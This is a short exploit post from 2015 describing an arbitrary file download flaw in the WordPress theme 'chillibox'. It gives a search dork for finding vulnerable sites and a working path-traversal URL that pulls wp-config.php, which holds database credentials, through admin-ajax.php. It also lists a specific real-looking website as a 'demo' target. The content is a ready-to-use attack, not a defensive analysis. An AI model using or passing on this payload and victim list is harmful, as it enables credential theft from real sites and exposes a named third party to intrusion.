facebook facebook twitter rss

Wordpress theme chillibox Arbitrary File Download Vulnerability

Author: KaMraN-Injector , Published: 14-01-2015
##############################################################
# Exploit Title: Wordpress theme chillibox Arbitrary File Download Vulnerability
#
# Exploit Author: KaMraN-Injector
#
# Discovered By: injector
#
# Dork 1: inurl:/wp-content/themes/chillibox/
#
# Date: 11-01-2015
#
# Tested on: Kali, Win7
#
# Category: webapps
#
# platform: php
##############################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] http://Site.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
##############
demo 1: http://www.shelfx.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
##############################################################
Contact number: +1 647 69 64 247
Contact mail: injector@rogers.com
official Website: Http://acc3ss.ir/
##############################################################

Like us on Facebook :